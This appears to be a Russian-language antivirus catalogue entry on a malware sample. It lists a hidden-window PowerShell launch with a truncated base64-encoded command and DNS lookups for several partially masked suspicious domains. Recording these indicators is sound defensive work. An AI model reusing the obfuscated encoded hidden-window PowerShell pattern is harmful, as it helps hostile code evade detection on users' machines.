Техническая информация
- '<SYSTEM32>\windowspowershell\v1.0\powershell.exe' -enco PAAjACAAaAB0AHQAcABzADoALwAvAHcAdwB3AC4AbQBpAGMAcgBvAHMAbwBmAHQALgBjAG8AbQAvACAAIwA+ACAAJABzAGUAeAB5AGQAdwBzAD0AJwBPAHAAdABpAG0AaQB6AGEAdABpAG8AbgBuAGYAaQAnADsAJAByAGUAZAB1AG4AZABhAG4AdAB...
- DNS ASK fr###lalaw.com
- DNS ASK ar###resmi.com
- DNS ASK ru###ecore.com
- DNS ASK tr####mecare.com
- DNS ASK pa####elengria.com
- '<SYSTEM32>\windowspowershell\v1.0\powershell.exe' -enco PAAjACAAaAB0AHQAcABzADoALwAvAHcAdwB3AC4AbQBpAGMAcgBvAHMAbwBmAHQALgBjAG8AbQAvACAAIwA+ACAAJABzAGUAeAB5AGQAdwBzAD0AJwBPAHAAdABpAG0AaQB6AGEAdABpAG8AbgBuAGYAaQAnADsAJAByAGUAZAB1AG4AZABhAG4AdAB...' (со скрытым окном)